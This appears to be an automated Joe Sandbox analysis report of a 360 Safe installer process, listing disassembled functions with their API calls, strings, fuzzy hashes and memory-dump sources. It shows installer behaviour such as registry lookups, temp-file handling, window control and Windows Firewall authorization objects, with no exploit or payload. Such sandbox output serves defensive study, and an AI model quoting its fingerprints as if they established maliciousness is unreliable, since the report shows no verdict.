Opcode ID: f0f723c75c8fe62a3c6e2f25cd479a47fe00e8b67fc86461c8a81315dc569943
Instruction ID: bf0460b75326475e6385a9f9a8b7e16a100f3778695e4ce4c37519af84150e0d
Opcode Fuzzy Hash: f0f723c75c8fe62a3c6e2f25cd479a47fe00e8b67fc86461c8a81315dc569943
Instruction Fuzzy Hash: F9419FB0648344AAE330DB54DD85FABB7E8EB88705F00091DB798971C1D7B9A508CB67

Function 00AE0877 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AE0896

Part of subcall function 00ADA6F2: _memset.LIBCMT ref: 00ADA71F
Part of subcall function 00ADA6F2: _memset.LIBCMT ref: 00ADA72D
Part of subcall function 00ADA6F2: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00A8BCDE), ref: 00ADA741
Part of subcall function 00ADA6F2: _memset.LIBCMT ref: 00ADA754
Part of subcall function 00ADA6F2: PathCombineW.SHLWAPI(?,?,?), ref: 00ADA784
Part of subcall function 00ADA6F2: _wcscat.LIBCMT ref: 00ADA796
Part of subcall function 00ADA6F2: PathFileExistsW.SHLWAPI(?), ref: 00ADA7A4

DeleteFileW.KERNEL32(?,00000010), ref: 00AE0903
_memset.LIBCMT ref: 00AE092F
GetTempPathW.KERNEL32(00000400,00000000,?,?,?), ref: 00AE0940

Part of subcall function 00AE0691: __EH_prolog3.LIBCMT ref: 00AE06B0
Part of subcall function 00AE0691: PathFileExistsW.SHLWAPI(?,00000010), ref: 00AE06CC
Part of subcall function 00AE0691: _memset.LIBCMT ref: 00AE070A
Part of subcall function 00AE0691: _memset.LIBCMT ref: 00AE07B9

SHCreateDirectory.SHELL32(00000000,?,?,{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp,00000000,?,?,?), ref: 00AE096E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AE09A7

Strings

{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp, xrefs: 00AE0952

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$Path$File$DeleteExistsH_prolog3Temp$CombineCreateDirectory_wcscat
String ID: {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp
API String ID: 3543345046-342223665
Opcode ID: 57a057f805a71b92d1eb9c43484240e221dc5e4c35ac8ab55ee07abd4ed500e4
Instruction ID: 0d5c37fbbe5e3ff7290619d487fc1e3590c0ab0efcf017d072336a7ef212c6be
Opcode Fuzzy Hash: 57a057f805a71b92d1eb9c43484240e221dc5e4c35ac8ab55ee07abd4ed500e4
Instruction Fuzzy Hash: 533173719002499BDB14EFA5DD92FFEB3B8FF04314F108429E615A7281EF746A09CBA5

Function 00AB71E2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AB7216
SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,00B5CDA4), ref: 00AB7239
PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,00B5CDA4), ref: 00AB7269
PathFileExistsW.SHLWAPI(?,?,?,00B5CDA4), ref: 00AB7273

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 00AB722F
360safe.exe, xrefs: 00AB725D
Path, xrefs: 00AB722A

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Path$CombineExistsFileValue_memset
String ID: 360safe.exe$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
API String ID: 1538502309-1025180333
Opcode ID: 2d39699b7197d8b715fa0363a0084d80c7f7e9c47925092bce2b3fbb3a0d2b36
Instruction ID: eda29da42d27048f102925e83f3898b0937e9dfda4a1261c65d892752810545e
Opcode Fuzzy Hash: 2d39699b7197d8b715fa0363a0084d80c7f7e9c47925092bce2b3fbb3a0d2b36
Instruction Fuzzy Hash: 0611ED71D0411C9BDB74EBA5DD49BEEBBBCAF08704F20412AF515E3192DBB15A48CB90

Function 00ACFF5C Relevance: 12.2, APIs: 8, Instructions: 193windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ACFF7B
GetDlgItem.USER32(?,00000415), ref: 00ACFF9A
_memset.LIBCMT ref: 00ACFFBD
GetWindowTextW.USER32(?,00000000,000003FF), ref: 00ACFFD1
IsWindowVisible.USER32(?), ref: 00ACFFEE

Part of subcall function 00A87FA1: __wcsicoll.LIBCMT ref: 00A87FB9

ShowWindow.USER32(?,00000000), ref: 00AD0021
GetFocus.USER32 ref: 00AD00D6

Part of subcall function 00AC48A3: SendMessageW.USER32(?,000000B1,?,?), ref: 00AC48BC
Part of subcall function 00AC48A3: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 00AC48CF

SetFocus.USER32(?), ref: 00AD00F0

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$FocusMessageSend$H_prolog3ItemShowTextVisible__wcsicoll_memset
String ID:
API String ID: 3004406801-0
Opcode ID: 13d1b0ea51f832dae5262c699ac265f29685f7c9a8e3bb89079d0899dbf03dbd
Instruction ID: 3c49bc542947c69e10ac60b04c6a150c3dad4bdd5b7bccd9efb1023f72aabca6
Opcode Fuzzy Hash: 13d1b0ea51f832dae5262c699ac265f29685f7c9a8e3bb89079d0899dbf03dbd
Instruction Fuzzy Hash: 2A71AD71900249AFDB24EFA0CD56FFEB7B5BF14304F108629F516A7292EB306A44CB61

Function 00AC639A Relevance: 12.2, APIs: 8, Instructions: 150windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AC63B9
GetDlgItem.USER32(?,000003EE), ref: 00AC63D8
_memset.LIBCMT ref: 00AC63F9
GetWindowTextW.USER32(?,00000000,000003FF), ref: 00AC640D
IsWindowVisible.USER32(?), ref: 00AC6434
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00AC6449
GetFocus.USER32 ref: 00AC6488
SetFocus.USER32(?), ref: 00AC64A2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FocusWindow$H_prolog3ItemMessageSendTextVisible_memset
String ID:
API String ID: 1096848440-0
Opcode ID: 50eda210b077339d139d25d74b30a19f862fdf76d8400d37d00edc6bfca60156
Instruction ID: 9905b231a25882d01b5c02e0c9ccd6a127c823e01d03ba45bf25e1373c2217b7
Opcode Fuzzy Hash: 50eda210b077339d139d25d74b30a19f862fdf76d8400d37d00edc6bfca60156
Instruction Fuzzy Hash: 33516B71900209AFDB24EBA0DE45FFEB7B8BF14705F10852DE516A7191EF70AA04CBA1

Function 00A74680 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 388COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A746A1
GetFileSizeEx.KERNEL32(?,?,00000000,?,00000003), ref: 00A746B3
_malloc.LIBCMT ref: 00A746E3
SetLastError.KERNEL32(00000008,?,?,?,00004000), ref: 00A746F3

Strings

PE, xrefs: 00A74766
INIT, xrefs: 00A74A52

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ErrorFileLastSize_malloc_memset
String ID: INIT$PE
API String ID: 942205088-3949469810
Opcode ID: bec1fc1444be3e978c04ba4392e802a5e32cb3af2840ea6396a3fe26f1a23418
Instruction ID: a3d38b239ba94f1706a79a0d4752d1edfaf8ce67b5e5001a39a5a320e14573b3
Opcode Fuzzy Hash: bec1fc1444be3e978c04ba4392e802a5e32cb3af2840ea6396a3fe26f1a23418
Instruction Fuzzy Hash: A6E18DB1A043419BDB24DF24DD41B6BBBE4EB98704F14C92AF99C9B241E771DD04CB92

Function 00A8995E Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00A89965

Part of subcall function 00A874B2: CLSIDFromProgID.COMBASE(?,?), ref: 00A874D1
Part of subcall function 00A874B2: CoCreateInstance.OLE32(?,?,?,00B2E8A0), ref: 00A874E9

SysFreeString.OLEAUT32(?), ref: 00A89A94
SysFreeString.OLEAUT32(?), ref: 00A89B14
SysFreeString.OLEAUT32(?), ref: 00A89BB9

Strings

HNetCfg.FwAuthorizedApplication, xrefs: 00A89AFB
HNetCfg.FwMgr, xrefs: 00A89975

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FreeString$CreateFromH_prolog3_catchInstanceProg
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 3810993049-1951265404
Opcode ID: 205a9799077afb3dcf244e582d9d1c6205367e8504102fd59d19b4003d4e507d
Instruction ID: 24344a781ecdb3dcfd38d4720c9ec0f08b7aa39d693ab4b69c41d8d025fd6cf9
Opcode Fuzzy Hash: 205a9799077afb3dcf244e582d9d1c6205367e8504102fd59d19b4003d4e507d
Instruction Fuzzy Hash: E4B1DA74A00249EFCF14EFE4C9889AEBBB5FF49305F284499E546EB251C7359D46CB20

Function 00A8D09B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 156COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00A8D0A2

Part of subcall function 00A8CE6B: __EH_prolog3_GS.LIBCMT ref: 00A8CE75
Part of subcall function 00A8CE6B: _memset.LIBCMT ref: 00A8CEE2
Part of subcall function 00A8CE6B: GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 00A8CEF9

Part of subcall function 00A8CFE7: __EH_prolog3.LIBCMT ref: 00A8CFEE

SetCurrentDirectoryW.KERNEL32(?,?,00B3CC68,00000000,?,themes,00000018,00A8BEB5,00000000), ref: 00A8D0F2

Part of subcall function 00AD4C7D: GetModuleHandleW.KERNEL32(sites.dll,00A8D12D,00B2F258,?,00000000,00000000), ref: 00AD4C8B

PathFileExistsW.SHLWAPI(00000000,00000000), ref: 00A8D1AF

Strings

themes, xrefs: 00A8D0A9
\theme_NewInstallAir.xml, xrefs: 00A8D1E1
\NewInstallAir\NewInstallAir.ui, xrefs: 00A8D172

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Path$CurrentDirectoryExistsFileH_prolog3H_prolog3_H_prolog3_catchHandleLongModuleName_memset
String ID: \NewInstallAir\NewInstallAir.ui$\theme_NewInstallAir.xml$themes
API String ID: 314926721-3980048744
Opcode ID: dec0c6776c07eefe1bcc835d80509f6c69f0afc38ad301bf2757d32477cac49d
Instruction ID: 29f0e6b9e16e25b617312f815312b1e613bc6d53c6a13fa03c99d6ed9cdde77e
Opcode Fuzzy Hash: dec0c6776c07eefe1bcc835d80509f6c69f0afc38ad301bf2757d32477cac49d
Instruction Fuzzy Hash: 09517E71A00209DBDF15FBE4CA49ABEBBB9AF45710F144158F116A72C2CB349E05CBB2

Function 00AA8C9F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AA8CA6

Part of subcall function 00AB72A6: __EH_prolog3.LIBCMT ref: 00AB72C5
Part of subcall function 00AB72A6: _memset.LIBCMT ref: 00AB72EC

Part of subcall function 00AB73D5: __EH_prolog3.LIBCMT ref: 00AB73F4
Part of subcall function 00AB73D5: _memset.LIBCMT ref: 00AB7422

InterlockedExchange.KERNEL32(?,00003001), ref: 00AA8E38

Part of subcall function 00A8AFB8: __EH_prolog3.LIBCMT ref: 00A8AFBF

Strings

.dir, xrefs: 00AA8CE8
360Installer, xrefs: 00AA8D6B
\custom_wnd.ini, xrefs: 00AA8DB8
\Setup.ini, xrefs: 00AA8D1D

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3$_memset$ExchangeInterlocked
String ID: .dir$360Installer$\Setup.ini$\custom_wnd.ini
API String ID: 3606139519-1812597268
Opcode ID: f89f9f7e06638cf8f3c71572b4eebf9f35976be7bd1c2e07c98c99d0780ccf03
Instruction ID: 0f87595057fbb33f5c76f4f29aa984c9f06e43efb3fb92cfbded4b9749967361
Opcode Fuzzy Hash: f89f9f7e06638cf8f3c71572b4eebf9f35976be7bd1c2e07c98c99d0780ccf03
Instruction Fuzzy Hash: F651BE71900249AFCB14EBF4CE96AFE77B8AF15300F104569F216A72D2DF74AA04CB61

Function 00AF2F80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AF2FCC
SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 00AF2FF5
_memset.LIBCMT ref: 00AF30A2
lstrcmpiA.KERNEL32(?,?), ref: 00AF30CA

Strings

mid, xrefs: 00AF2FE6
Software\360Safe\Liveup, xrefs: 00AF2FEB

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$Valuelstrcmpi
String ID: Software\360Safe\Liveup$mid
API String ID: 999496690-2395435937
Opcode ID: 835f943ca0fb1acc330c8e0b6a4564235eaf2111749ace502a28f5d975ad7698
Instruction ID: 085719a486d5f19a223f9d0edbbc3f7b60dfa2dad57917dbfb6199642ad6f11b
Opcode Fuzzy Hash: 835f943ca0fb1acc330c8e0b6a4564235eaf2111749ace502a28f5d975ad7698
Instruction Fuzzy Hash: 2441E4325043498BDB34CB74C951BFB77E8AF85704F04495EF69A87141EF719A09CBA2

Function 00ACF7F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateSolidBrush.GDI32(00FFFFFF), ref: 00ACF81D
GetDlgItem.USER32(?,0000040F), ref: 00ACF84A

Part of subcall function 00AC3197: InvalidateRect.USER32(?,00000000,00000000,?,?,00AC0207,?), ref: 00AC31AD

GetDlgItem.USER32(?,000003EB), ref: 00ACF8CF
GetDlgItem.USER32(?,00000410), ref: 00ACF925

Part of subcall function 00ABF7D0: SetWindowLongW.USER32(?,000000FC,?), ref: 00ABF7F6

GetDlgItem.USER32(?,000003EC), ref: 00ACF965

Part of subcall function 00AA6C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00AA6CBC

Strings

PNG, xrefs: 00ACF8DF

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Item$LongWindow$BrushCreateInvalidateRectSolid
String ID: PNG
API String ID: 3239997845-364855578
Opcode ID: 6f85e71197841036043f298650ce7daefb9357d9a27167e7b68960e344afe174
Instruction ID: e4afd17cac1b29a4aa895fdf185f4abec7bcdbf6cb5dfd5afa8057ec0fc4b1d0
Opcode Fuzzy Hash: 6f85e71197841036043f298650ce7daefb9357d9a27167e7b68960e344afe174
Instruction Fuzzy Hash: DB416D31200B04AFE725AB60CD82FABB7A9EF05714F044A2DF1AA565E2DF657914CB11

Function 00AC4A8C Relevance: 10.6, APIs: 7, Instructions: 74COMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000005,?), ref: 00AC4AAC
MoveWindow.USER32(?,?,00000104,000000AF,00000050,00000001,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000), ref: 00AC4AE4
MoveWindow.USER32(?,?,000000CE,000000AF,00000050,00000001,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000), ref: 00AC4B04
ShowWindow.USER32(?,00000000,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00AC4B17
DestroyWindow.USER32(?,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00AC4B2E
ShowWindow.USER32(?,00000000,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00AC4B3B
ShowWindow.USER32(?,00000001,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00AC4B47

Part of subcall function 00AB58F3: __EH_prolog3.LIBCMT ref: 00AB58FA

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Show$Move$ClientDestroyH_prolog3Rect
String ID:
API String ID: 1342398966-0
Opcode ID: 3c61e3b4adbd1d5d1df8d8ad222a4c5044d3e5713baf024c964d0a607a020ee4
Instruction ID: 5168ce8c89b23ae87ff27f4537bb8be93b25fdf167ec7b55ff9445d65a4fb367
Opcode Fuzzy Hash: 3c61e3b4adbd1d5d1df8d8ad222a4c5044d3e5713baf024c964d0a607a020ee4
Instruction Fuzzy Hash: 86219076600615BBEB206FB9CD85FEF7BB9BF48305F04092CB666D2191DB71A9008B94

Function 00AFEA8C Relevance: 10.6, APIs: 7, Instructions: 71threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00AFEABD
__calloc_crt.LIBCMT ref: 00AFEAC9
__getptd.LIBCMT ref: 00AFEAD6
__initptd.LIBCMT ref: 00AFEADF
CreateThread.KERNEL32(?,?,00AFEA09,00000000,?,?), ref: 00AFEB0D
GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AFEB17
__dosmaperr.LIBCMT ref: 00AFEB2F

Part of subcall function 00AF98D1: __getptd_noexit.LIBCMT ref: 00AF98D1

Part of subcall function 00AFA5B1: __decode_pointer.LIBCMT ref: 00AFA5BC

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
String ID:
API String ID: 3358092440-0
Opcode ID: 62770cbdda07c5d1e9be8d2679d370a00c24e36e46b188a6fa79085f05551800
Instruction ID: e8c8aa9b95dcc99196a3a65d8f092692338915991d7f95df75f63c7e8f8185e3
Opcode Fuzzy Hash: 62770cbdda07c5d1e9be8d2679d370a00c24e36e46b188a6fa79085f05551800
Instruction Fuzzy Hash: 94110E7250120DAFDB21FFE8DD868AF7BE5FF00360B10402AF311A30A1EB7199018BA1

Function 00AE1DA8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE1DD0

Part of subcall function 00AA0579: _vswprintf_s.LIBCMT ref: 00AA05AB

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,00000000,?,?), ref: 00AE1E06
DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 00AE1E30
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?), ref: 00AE1E3B
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?), ref: 00AE1E43

Strings

\\.\%c:, xrefs: 00AE1DDA

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
String ID: \\.\%c:
API String ID: 759969516-1260769427
Opcode ID: 53eb9f52bf6972e47794e58289ae10a60850df50dc5552efe7fb49162db48e5a
Instruction ID: 6b3e6aa52a2c61957b352c1769d7f66131aad05ddbcce5231894ee185419c01b
Opcode Fuzzy Hash: 53eb9f52bf6972e47794e58289ae10a60850df50dc5552efe7fb49162db48e5a
